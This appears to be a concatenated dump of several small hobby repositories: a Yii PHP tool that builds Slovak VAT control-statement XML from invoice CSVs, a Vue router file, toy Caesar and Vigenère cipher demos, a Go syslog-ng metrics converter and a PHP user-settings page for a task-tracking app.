     * Standard standalone Yii actions (error page, captcha).
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
            'captcha' => [
                'class' => 'yii\captcha\CaptchaAction',
                'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
            ],
        ];
    }

    /**
     * Main page: parsed invoice tables plus the declaration summary.
     * The one-shot 'success' session flag (set by actionGenerate) drives
     * the "generated" message and is cleared on read.
     */
    public function actionIndex()
    {
        list($incomes, $expenses, $corrections) = $this->getData();
        list($vatSum, $vatBaseSum, $vatDebitsSum) = $this->getDeclaration($incomes, $expenses, $corrections);
        $showMsg = Yii::$app->session['success'];
        unset(Yii::$app->session['success']);
        return $this->render('index', array(
            'incomes' => $incomes,
            'expenses' => $expenses,
            'corrections' => $corrections,
            'vatSum' => $vatSum,
            'vatBaseSum' => $vatBaseSum,
            // Cash-register receipts ("blocky") add their precomputed
            // deductible VAT share (see actionGenerate).
            'vatDebitsSum' => $vatDebitsSum + Yii::$app->session['billsDeduction'],
            // Defaults: current year / current quarter when nothing stored.
            'year' => Yii::$app->session['year'] ?: date('Y'),
            'quarter' => Yii::$app->session['quarter'] ?: ceil(date('m')/3),
            'bills' => Yii::$app->session['bills'] ?: '',
            'showMsg' => $showMsg
        ));
    }

    /**
     * Form POST handler. The 'calculate' button only stores the period and
     * receipts total in the session and redirects home; otherwise both XML
     * reports are rendered for the ticked invoices and written to output/.
     */
    public function actionGenerate()
    {
        // Checkbox selections; absent groups post as null.
        $selectedIncomes = Yii::$app->request->post('incomes');
        $selectedExpenses = Yii::$app->request->post('expenses');
        $selectedCorrections = Yii::$app->request->post('corrections');
        if(!$selectedIncomes) $selectedIncomes = [];
        if(!$selectedExpenses) $selectedExpenses = [];
        if(!$selectedCorrections) $selectedCorrections = [];
        list($incomes, $expenses, $corrections) = $this->getData();
        // Declaration totals are computed over ALL rows, before filtering.
        list($vatSum, $vatBaseSum, $vatDebitsSum) = $this->getDeclaration($incomes, $expenses, $corrections);
        // Keep only the invoices whose checkboxes were ticked.
        $incomes = array_intersect_key($incomes, array_flip($selectedIncomes));
        $expenses = array_intersect_key($expenses, array_flip($selectedExpenses));
        $corrections = array_intersect_key($corrections, array_flip($selectedCorrections));
        // Receipts: VAT share at the 20% rate, of which 80% is deductible.
        $bills = (float)Yii::$app->request->post('bills');
        $billsDeduction = ($bills - $bills / 1.2) * 0.8;
        if(Yii::$app->request->post('calculate')) {
            Yii::$app->session['year'] = Yii::$app->request->post('year');
            Yii::$app->session['quarter'] = Yii::$app->request->post('quarter');
            Yii::$app->session['bills'] = Yii::$app->request->post('bills');
            Yii::$app->session['billsDeduction'] = $billsDeduction;
            return $this->goHome();
        }
        $xml = $this->renderPartial('control_statement', array(
            'incomes' => $incomes,
            'expenses' => $expenses,
            'corrections' => $corrections,
            'quarter' => Yii::$app->request->post('quarter'),
            'year' => Yii::$app->request->post('year'),
            'bills' => array(
                'vat' => $bills - $bills / 1.2,
                // NOTE(review): the stray ", 2" below creates a meaningless
                // 0 => 2 array element -- it looks like a leftover from a
                // round(..., 2) call; verify and remove.
                'vatBase' => $bills / 1.2, 2,
                'deduction' => $billsDeduction
            )
        ));
        file_put_contents("output/control_statement_".date('Y_m_d').'.xml', $xml);
        $xml = $this->renderPartial('vat_declaration', array(
            'vat' => $vatSum,
            'base' => $vatBaseSum,
            'debits' => $vatDebitsSum + $billsDeduction,
            // The declaration form expects the quarter as a Roman numeral.
            'quarter' => ['I', 'II', 'III', 'IV'][Yii::$app->request->post('quarter') - 1],
            'year' => Yii::$app->request->post('year')
        ));
        file_put_contents("output/vat_declaration_".date('Y_m_d').'.xml', $xml);
        Yii::$app->session['success'] = true;
        return $this->goHome();
    }

    /**
     * Load all three datasets and sort each by document date.
     * @return array [incomes, expenses, corrections], keyed by invoice no.
     */
    private function getData()
    {
        $clients = $this->getClients();
        $data = $this->getExpenses($clients);
        $expenses = $data['expenses'];
        $corrections = $data['corrections'];
        $incomes = $this->getIncomes();
        uasort($expenses, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
        uasort($corrections, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
        uasort($incomes, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
        return array($incomes, $expenses, $corrections);
    }

    /**
     * Sum output VAT / VAT base over incomes and deductible VAT over
     * expenses plus corrections (corrections carry non-positive VAT).
     * @return array [vatSum, vatBaseSum, vatDebitsSum]
     */
    private function getDeclaration($incomes, $expenses, $corrections)
    {
        $vatSum = $vatBaseSum = $vatDebitsSum = 0;
        foreach($incomes as $income) {
            $vatSum += $income['vat'];
            $vatBaseSum += $income['vatBase'];
        }
        foreach($expenses as $expense) {
            $vatDebitsSum += $expense['vat'];
        }
        foreach($corrections as $correction) {
            $vatDebitsSum += $correction['vat'];
        }
        return array($vatSum, $vatBaseSum, $vatDebitsSum);
    }

    /**
     * Clients from input/klienti.csv keyed by name; rows without a VAT id
     * (column 6) are skipped.
     */
    private function getClients()
    {
        $data = $this->readCSV('klienti.csv');
        array_shift($data); // drop the header row
        $clients = [];
        foreach($data as $client) {
            if(!$client[6]) continue;
            $clients[$client[0]] = array(
                'ico' => preg_replace('/\s/', '', $client[4]),
                'dic' => $client[5],
                'icdph' => $client[6],
            );
        }
        return $clients;
    }

    /**
     * Issued invoices from input/vystavene_faktury.csv keyed by invoice no.
     * Amount columns use the Slovak format (space thousands separator,
     * comma decimal); they are normalised to floats here.
     */
    private function getIncomes()
    {
        $data = $this->readCSV('vystavene_faktury.csv');
        array_shift($data); // drop the header row
        $incomes = [];
        foreach($data as $income) {
            // NOTE(review): createFromFormat() returns false on a malformed
            // date and format() below would then fatal -- assumes clean exports.
            $date = \DateTime::createFromFormat('d.m.Y', $income[9]);
            $vat = (float)str_replace(array(' ', '.', ','), array('', '', '.'), $income[11]);
            $client = preg_replace('/\s/', '', $income[6]);
            $invoice = $income[2];
            if(!$client || !$invoice) continue;
            $incomes[$invoice] = array(
                'client' => $client,
                'vat' => $vat,
                'vatBase' => (float)str_replace(array(' ', '.', ','), array('', '', '.'), $income[10]),
                'date' => $date->format('Y-m-d'),
                'invoice' => $invoice,
            );
        }
        return $incomes;
    }

    /**
     * Expense rows from input/vydavky.csv, split into regular expenses
     * (positive VAT) and credit notes ("dobropisy", non-positive VAT).
     * Only rows whose supplier is a known VAT-registered client are kept.
     */
    private function getExpenses($clients)
    {
        $data = $this->readCSV('vydavky.csv');
        array_shift($data); // drop the header row
        $expenses = ['expenses' => [], 'corrections' => []];
        foreach($data as $expense) {
            $clientName = $expense[3];
            $vat = (float)str_replace(array(' ', '.', ','), array('', '', '.'), $expense[12]);
            $invoice = $expense[22];
            $date = \DateTime::createFromFormat('d.m.Y', $expense[6]);
            if(!array_key_exists($clientName, $clients) || !$invoice) continue;
            $client = $clients[$clientName];
            $type = $vat > 0 ? 'expenses' : 'corrections';
            $expenses[$type][$invoice] = array(
                'name' => $expense[1],
                'client' => $client['icdph'],
                'vatBase' => (float)str_replace(array(' ', '.', ','), array('', '', '.'), $expense[11]),
                'vat' => $vat,
                'date' => $date->format('Y-m-d'),
                'invoice' => $invoice,
                'price' => (float)$expense[9]
            );
            // Credit notes reference the corrected invoice inside their name.
            // NOTE(review): the regex class A-z also matches [\]^_` -- verify.
            if(strpos($expense[1], 'DOBROPIS') !== false) {
                $expenses[$type][$invoice]['baseInvoice'] = preg_replace('/DOBROPIS|[^A-z0-9]/', '', $expense[1]);
            }
        }
        return $expenses;
    }

    /**
     * Parse input/<fileName> line-by-line with str_getcsv; [] when missing.
     * NOTE(review): splitting on PHP_EOL breaks quoted fields containing
     * newlines and foreign line endings -- acceptable for simple exports.
     */
    private function readCSV($fileName)
    {
        $file = "input/$fileName";
        if(!file_exists($file)) return [];
        $csvData = file_get_contents($file);
        $lines = explode(PHP_EOL, $csvData);
        $array = [];
        foreach ($lines as $line) {
            $array[] = str_getcsv($line);
        }
        return $array;
    }
}
<file_sep>/views/site/index.php
<?php
/* @var $this yii\web\View */
// Single-screen UI: period/receipts inputs, three review grids with
// per-invoice checkboxes, the VAT summary panel and two submit buttons.
// nf() (used below) is a number-formatting helper defined elsewhere.
use yii\grid\GridView;
use yii\data\ArrayDataProvider;
use yii\widgets\ActiveForm;
use yii\helpers\Html;
$this->title = 'Generator kontrolneho vykazu DPH';
?>
<div class="site-index">
<div class="body-content">
<?php
// Everything posts to SiteController::actionGenerate().
$form = ActiveForm::begin([
'method' => 'post',
'action' => ['site/generate'],
]);
?>
<?php if($showMsg) : ?>
<div class="row">
<div class="alert alert-success" role="alert">
<strong>Uspech!</strong> Kontrolny vykaz bol vygenerovany.
</div>
</div>
<?php endif; ?>
<div class="row">
<div class="col-lg-4">
<label>Kvartal:</label>
<?= Html::textInput('quarter', $quarter) ?>
</div>
<div class="col-lg-4">
<label>Rok:</label>
<?= Html::textInput('year', $year) ?>
</div>
<div class="col-lg-4">
<label>Blocky:</label>
<?= Html::textInput('bills', $bills) ?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
// Incomes grid: rows without VAT are highlighted ("danger") and their
// checkboxes start unticked.
$incomesProvider = new ArrayDataProvider([
'allModels' => $incomes,
]);
echo GridView::widget([
'dataProvider' => $incomesProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Prijmy',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'incomes',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'client', 'vat', 'vatBase', 'date', 'invoice'
)
]);
?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
// Expenses grid -- same selection/highlighting rules as incomes.
$expensesProvider = new ArrayDataProvider([
'allModels' => $expenses,
]);
echo GridView::widget([
'dataProvider' => $expensesProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Naklady',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'expenses',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'name', 'client', 'vatBase', 'vat', 'date', 'invoice', 'price'
)
]);
?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
// Credit notes ("dobropisy") grid; also shows the corrected base invoice.
$correctionsProvider = new ArrayDataProvider([
'allModels' => $corrections,
]);
echo GridView::widget([
'dataProvider' => $correctionsProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Dobropisy',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'corrections',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'name', 'client', 'vatBase', 'vat', 'date', 'baseInvoice', 'invoice', 'price'
)
]);
?>
</div>
</div>
<div class="row">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Priznanie k DPH</h3>
</div>
<ul class="list-group">
<li class="list-group-item">Zaklad DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatBaseSum) ?></strong>
</li>
<li class="list-group-item">Fakturovana DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatSum) ?></strong>
</li>
<li class="list-group-item">Odpocet DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatDebitsSum) ?></strong>
</li>
<li class="list-group-item">Vysledna DPH na zaplatenie:</li>
<li class="list-group-item">
<strong><?= nf($vatSum - $vatDebitsSum) ?></strong>
</li>
</ul>
</div>
</div>
<?= Html::submitButton('Prepocitat', ['name' => 'calculate', 'value' => 1, 'class' => 'btn btn-primary']) ?>
<?= Html::submitButton('Vygenerovat XML', ['class' => 'btn btn-success']) ?>
<?php $form->end(); ?>
</div>
</div>
<file_sep>/views/site/control_statement.php
<?php /* Yii view: Slovak VAT control statement (kontrolny vykaz) XML.
Expects: $year, $quarter, $incomes (A1 rows), $expenses (B2 rows),
$corrections (C2 rows) and $bills (B3 totals: vat/vatBase/deduction);
nf() is a number-formatting helper defined elsewhere. Taxpayer identity
is hard-coded. The closing "? >" eats the following newline, so the
emitted document still starts with the XML declaration. */ ?>
<?xml version="1.0" encoding="utf-8"?>
<KVDPH xmlns="https://ekr.financnasprava.sk/Formulare/XSD/kv_dph_2014.xsd">
<Identifikacia>
<IcDphPlatitela>SK1082215475</IcDphPlatitela>
<Druh>R</Druh>
<Obdobie>
<Rok><?= $year ?></Rok>
<Stvrtrok><?= $quarter ?></Stvrtrok>
</Obdobie>
<Nazov><NAME></Nazov>
<Stat></Stat>
<Obec>Banská Bystrica I</Obec>
<PSC>97411</PSC>
<Ulica>Javornícka</Ulica>
<Cislo>6169/31</Cislo>
<Tel></Tel>
<Email></Email>
</Identifikacia>
<Transakcie>
<?php foreach($incomes as $income) : ?>
<A1 S="20" D="<?= nf($income['vat']) ?>" Z="<?= nf($income['vatBase']) ?>" Den="<?= $income['date'] ?>" F="<?= $income['invoice'] ?>" Odb="<?= $income['client'] ?>"/>
<?php endforeach; ?>
<?php foreach($expenses as $expense) : ?>
<B2 O="<?= nf($expense['vat']) ?>" S="20" D="<?= nf($expense['vat']) ?>" Z="<?= nf($expense['vatBase']) ?>" Den="<?= $expense['date'] ?>" F="<?= $expense['invoice'] ?>" Dod="<?= $expense['client'] ?>"/>
<?php endforeach; ?>
<B3 O="<?= nf($bills['deduction']) ?>" D="<?= nf($bills['vat']) ?>" Z="<?= nf($bills['vatBase']) ?>"/>
<?php foreach($corrections as $correction) : ?>
<C2 OR="<?= nf($correction['vat']) ?>" S="20" DR="<?= nf($correction['vat']) ?>" ZR="<?= nf($correction['vatBase']) ?>" FP="<?= $correction['baseInvoice'] ?>" FO="<?= $correction['invoice'] ?>" Dod="<?= $correction['client'] ?>"/>
<?php endforeach; ?>
</Transakcie>
</KVDPH>
| 9bb1b5a1597f85127d35352c90fc7d4b9fb7173d | [
"PHP"
] | 4 | PHP | sutulustus/vat_statement_generator | 9f8406d1e6be39f79124b1179f8e3752e18e83c8 | cd021d4430e4e4b41f89d8b5cc2af3fa4f3db030 |
refs/heads/master | <file_sep>import Vue from 'vue'
import Router from 'vue-router'
import HelloWorld from '../components/HelloWorld'
import Dfooter from '../components/common/Dfooter/Dfooter'
import personalCenter from '../components/page/personalCenter/personalCenter'
import orders from '../components/page/orders/orders'
import index from '../components/page/index/index'
import goods from '../components/goods/goods'
import appointment from '../components/page/appointment/appointment'
import cook from '../components/page/cook/cook'
import cookDetail from '../components/page/cookDetail/cookDetail'
import cookOrders from '../components/page/cookOrders/cookOrders'
import map from '../components/common/map/map'
// Install the router plugin before the router instance is constructed.
Vue.use(Router)
// Application route table.
// Two shell components host nested child routes:
//   - Dfooter: customer-facing pages that share the bottom tab bar
//   - cook:    kitchen-side pages (redirects to the live order list)
export default new Router({
// HTML5 history mode: clean URLs without the '#' fragment.
// NOTE: the server must rewrite unknown paths to index.html for
// deep links to resolve.
mode:'history',
routes: [
{
// Landing redirect: '/' opens the index tab.
path: '/',
redirect: '/index'
},
{
path: '/Dfooter',
component: Dfooter,
// Tab-bar pages rendered inside the Dfooter shell.
children:[
{
path: '/index',
component: index
},
{
path: '/orders',
component: orders
},
{
path: '/personalCenter',
component: personalCenter
},
{
path: '/goods',
component: goods
},
{
path: '/appointment',
component: appointment
},
]
},
{
// Kitchen shell: '/cook' itself forwards to the order list.
path: '/cook',
redirect: '/cookOrders',
component: cook,
children:[
{
path: '/cookDetail',
component: cookDetail
},
{
path: '/cookOrders',
component: cookOrders
},
]
},
{
path: '/map',
component: map
},
],
// CSS class applied to <router-link> elements whose route is active.
linkActiveClass:'active',
})
| 64e00665eec024a4cddb43e699f065b8c98284d5 | [
"JavaScript"
] | 1 | JavaScript | hong597853910/diancan | 94092aaf1ef3711b3aec6bceccccb1a6661f0ec2 | 3f707ac8fbb246210ce5b1639920e7dbcc90207d |
refs/heads/master | <file_sep>// vigenere.js
// Lowercase alphabet shared by the Vigenère helpers below.
var alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"];

// Maps a position in the input text to the alphabet index (0-25) of the
// key letter used at that position. The key is cycled with modular
// arithmetic: position `number` lines up with key letter `number % key.length`.
// NOTE(review): assumes the key is lowercase a-z; any other character
// yields -1 and produces a wrong shift — confirm callers sanitise keys.
function getKeyLetterAlphabetPosition(number, key) {
    var keyLetterPosition = number % key.length;
    var keyLetterAtPosition = key.charAt(keyLetterPosition);
    return alphabet.indexOf(keyLetterAtPosition);
}

// Vigenère cipher over the lowercase alphabet.
//   mode  - true to encrypt, false (or anything else) to decrypt
//   input - text to transform. Newlines are dropped (unchanged from the
//           original); any other character outside a-z is passed through
//           unchanged (the original appended the string "undefined").
//   key   - lowercase keyword
// Returns the transformed text.
function crypt(mode, input, key) {
    var finaloutput = "";
    for (var i = 0; i < input.length; i++) {
        var ch = input.charAt(i);
        if (ch == "\n") {
            continue; // newlines are silently dropped
        }
        var inputLetterPosition = alphabet.indexOf(ch);
        if (inputLetterPosition === -1) {
            finaloutput += ch; // non-alphabet character: copy verbatim
            continue;
        }
        // The shift index is the raw position i, so skipped characters
        // still consume key letters (preserves original alignment).
        var shift = getKeyLetterAlphabetPosition(i, key);
        var finalLetterPosition;
        if (mode === true) { // encrypt: add the key letter's offset, wrap around
            finalLetterPosition = (inputLetterPosition + shift) % alphabet.length;
        } else { // decrypt: subtract the offset, wrap below zero
            finalLetterPosition = inputLetterPosition - shift;
            if (finalLetterPosition < 0) {
                finalLetterPosition += alphabet.length;
            }
        }
        finaloutput += alphabet[finalLetterPosition];
    }
    return finaloutput;
}
<file_sep>var inputtext;
var key;
// Shorthand for document.getElementById.
function gid(a) {
    return document.getElementById(a);
}
// Cache the form elements once at load time.
var plaintextbox = gid("plaintextbox");
var keybox = gid("keybox");
var outputbox = gid("outputbox");
// Refresh the module-level inputtext/key from the form fields.
function updatevars() {
    inputtext = plaintextbox.value;
    // Always pass the radix: a base-10 key is wanted regardless of
    // leading zeros in the field.
    key = parseInt(keybox.value, 10);
}
// Run the cipher in the requested direction and display the result.
function visualcrypt(mode) {
    updatevars();
    // textContent instead of innerHTML: the cipher output may echo
    // user-typed characters, which must not be interpreted as markup.
    outputbox.textContent = crypt(mode, inputtext, key);
}
function encrypt() {
    visualcrypt(true);
}
function decrypt() {
    visualcrypt(false);
}
document.getElementById("encryptbtn").addEventListener("click", encrypt);
document.getElementById("decryptbtn").addEventListener("click", decrypt);
<file_sep>// A Caesar cipher implementation with support for custom alphabets
// Default lowercase alphabet; reassign `alphabet` to one of the variants
// below (or your own array) to cipher over a custom character set.
var alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"];
var origalphabet = alphabet; // handle on the default alphabet
var upperbet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"];
var lowandup = origalphabet.concat(upperbet);
var alphanumeric = lowandup.concat(["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]);

// Caesar cipher over the current `alphabet`.
//   mode  - true to encrypt, false (or anything else) to decrypt
//   input - text to transform; characters outside the alphabet are passed
//           through unchanged (the original appended the string "undefined")
//   key   - shift amount in 1 .. alphabet.length-1
// Returns the transformed text, or an error string for an invalid key.
function crypt(mode, input, key) {
    var outputtext = "";
    if (key < 1 || key > (alphabet.length - 1)) {
        outputtext = "Error: key was lower than 1 or greater than " + (alphabet.length - 1);
        return outputtext; // end the function
    }
    for (var i = 0; i < input.length; i++) {
        var ch = input.charAt(i);
        var position = alphabet.indexOf(ch);
        if (position === -1) {
            outputtext += ch; // non-alphabet character: copy verbatim
            continue;
        }
        var l;
        if (mode === true) { // encrypt: shift forward and wrap around
            l = (position + key) % alphabet.length;
        } else { // decrypt: shift back and wrap below zero
            l = position - key;
            if (l < 0) {
                l = l + alphabet.length;
            }
        }
        outputtext += alphabet[l];
    }
    return outputtext;
}
<file_sep>function gid(id) {
return document.getElementById(id);
}
// Cached form elements (gid is a getElementById shorthand defined above).
var inputbox = gid("input");
var outputbox = gid("output");
var keybox = gid("key");
var encryptbtn = gid("encryptbtn");
var decryptbtn = gid("decryptbtn");
var input, key;
// Re-read the form fields, stripping every space from both text and key
// (the cipher works on contiguous lowercase letters).
function updatevars() {
// strip spaces
input = inputbox.value.replace(/ /g, "");
key = keybox.value.replace(/ /g, "");
}
// Run the cipher in the requested direction, show the result and log how
// long the operation took.
function visualcrypt(mode) {
updatevars();
var beginTime = (new Date()).getTime();
outputbox.innerHTML = crypt(mode, input, key);
var endTime = (new Date()).getTime();
console.log("Ciphering operation took " + (endTime - beginTime) + " millisecond(s)");
}
function encrypt() {
visualcrypt(true);
}
function decrypt() {
visualcrypt(false);
}
// Wire the buttons up once at load time.
encryptbtn.addEventListener("click", encrypt);
decryptbtn.addEventListener("click", decrypt);
<file_sep># js-crypt-demos
**No longer developed:** Please check out the new [crypto-toolkit](https://github.com/mariuszskon/crypto-toolkit) repository.
This is a repo with a couple of custom-made JavaScript tools which can encrypt and decrypt with various (weak) algorithms.
**Warning:** I am not a professional cryptographer. Do not use these tools to secure important confidential communications.
| ab08001528ba693980943026a993c960889dbc68 | [
"JavaScript",
"Markdown"
] | 5 | JavaScript | mariuszskon/js-crypto-demos | 78cd3edfdda62b0a02ae25af7b24a52450e1e0bb | 3725ab19bf13abd2c9eb356cf3a06ca7b4ff844b |
refs/heads/master | <file_sep>package main
import (
"testing"
)
// TestParseSyslogNgMetricsReturnsValue feeds a well-formed stats dump
// (header row plus one data row) through the parser and expects a
// non-empty metrics string back.
func TestParseSyslogNgMetricsReturnsValue(t *testing.T) {
	stats := []byte("SourceName;SourceId;SourceInstance;State;Type;Number\n1;2;3;4;5;6\n")
	if got := parseSyslogNgMetrics(stats); len(got) == 0 {
		t.Errorf("Returned metrics are nil")
	}
}
<file_sep>/*TODO:
* sort the metrics output
* output HELP information for each metric
* output TYPE information for each metric
*/
package main
import (
"fmt"
"log"
"os/exec"
"strings"
)
// parseSyslogNgMetrics takes output from the `syslog-ng-ctl stats` command
// (semicolon-separated fields, first line is a header) and converts it to
// Prometheus text metrics format, one `syslog_ng_<type>_total` sample per
// stats row. Rows with fewer than six fields are skipped instead of
// triggering an index-out-of-range panic.
func parseSyslogNgMetrics(stats []byte) (metrics string) {
	var metricsSlice []string
	strStats := strings.Trim(string(stats), "\n")
	// Remove the first line of output, which contains field headers.
	for _, line := range strings.Split(strStats, "\n")[1:] {
		s := strings.Split(line, ";")
		if len(s) < 6 {
			continue // skip malformed/short lines
		}
		// since `type` is a keyword in Go, we rename the `type`
		// field from SyslogNG to `typeo`. No reason behind
		// picking this name.
		sourceName, sourceID, sourceInstance, state, typeo, number := s[0], s[1], s[2], s[3], s[4], s[5]
		metricsSlice = append(metricsSlice, fmt.Sprintf("syslog_ng_%s_total{source_name=\"%s\",source_id=\"%s\",source_instance=\"%s\",state=\"%s\"} %s\n", typeo, sourceName, sourceID, sourceInstance, state, number))
	}
	metrics = strings.Trim(strings.Join(metricsSlice, ""), "\n")
	return
}
// main shells out to syslog-ng-ctl, echoes the raw stats dump, then
// prints its Prometheus text-format translation.
func main() {
	raw, err := exec.Command("/usr/local/sbin/syslog-ng-ctl", "stats").Output()
	if err != nil {
		log.Fatal(err)
	}
	fmt.Print(string(raw))
	fmt.Println(parseSyslogNgMetrics(raw))
}
| 342f165d6567477187ab3fd2cbcb055a749f3437 | [
"Go"
] | 2 | Go | zygiss/textfile-collectors | d9a386759d7399fb7414c97677c7081632a09be9 | a4e1b954775df0395fb16b145a9c7ef55f2a6271 |
refs/heads/main | <file_sep><?php
session_start();
include('../config/connection.php');

// Require an authenticated session BEFORE touching the database
// (the original ran the queries first and checked the session last).
if (!isset($_SESSION['UserId'])) {
    header('Location:index.php');
    exit; // header() alone does not stop the rest of the script
}

// Load the current user's credentials to pre-fill the settings form.
// Prepared statement: never interpolate values into SQL directly.
$stmt = $con->prepare('SELECT username, password FROM users WHERE id = ?');
$stmt->bind_param('i', $_SESSION['UserId']);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$username = $row['username'];
$password = $row['password'];

$check = true;
if (isset($_POST['submit'])) {
    // Server-side validation: both fields must be present and longer
    // than 4 characters.
    // NOTE(review): the client-side script enables the button at >3
    // characters — confirm which threshold is intended.
    if (!empty($_POST['name']) && strlen($_POST['name']) > 4) {
        $name = $_POST['name'];
    } else {
        $check = false;
    }
    if (!empty($_POST['password']) && strlen($_POST['password']) > 4) {
        $pass = $_POST['password'];
    } else {
        $check = false;
    }
    if ($check) {
        // Prepared statement fixes the SQL injection in the original
        // string-concatenated UPDATE.
        // NOTE(review): passwords are stored in plain text app-wide —
        // they should be hashed with password_hash().
        $stmt = $con->prepare('UPDATE users SET username = ?, password = ? WHERE id = ?');
        $stmt->bind_param('ssi', $name, $pass, $_SESSION['UserId']);
        $stmt->execute();
        header('Location:home.php');
        exit;
    }
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/submitBtn.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<div class="text-center col-xs-12 col-sm-10 col-md-6" style="margin: auto; padding: 20px">
<!-- Material form contact -->
<div class="card">
<h5 class="card-header info-color white-text text-center py-4" style="background-color: #fcb628">
<strong>Settings</strong>
</h5>
<!--Card content-->
<div class="card-body px-lg-5 pt-0">
<!-- Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>" class="text-center" style="color: #757575;">
<!-- Name -->
<div class="md-form mt-3">
<input type="text" id="name" name="name" class="form-control" value="<?php echo $username?>">
<label for="name">Username</label>
</div>
<!-- E-mail -->
<div class="md-form">
<input type="password" id="password" name="password" class="form-control" value="<?php echo $password?>"><input id="pass" value="?" type="button" onclick="passChange()">
<label for="password">Password</label>
</div>
<!-- Send button -->
<button id="create" class="btn btn-outline-info btn-rounded btn-block z-depth-0 my-4 waves-effect" disabled name="submit" type="submit">Save settings</button>
</form>
<!-- Form -->
</div>
</div>
<!-- Material form contact -->
</div>
<script>
    // Enable the submit button only when BOTH fields hold more than
    // three characters. (The original registered two handlers whose
    // password check overwrote the username check, so the button state
    // effectively tracked only the password field.)
    function refreshSubmitState() {
        var nameOk = $("#name").val().length > 3;
        var passOk = $("#password").val().length > 3;
        $("#create").prop("disabled", !(nameOk && passOk));
    }
    $(document).ready(function () {
        $("#name").on('input', refreshSubmitState);
        $("#password").on('input', refreshSubmitState);
    });
    // Toggle the password field between masked and clear text
    // (wired to the "?" button's onclick).
    function passChange() {
        var field = document.getElementById("password");
        field.type = (field.type === "password") ? "text" : "password";
    }
</script>
<!-- Optional JavaScript -->
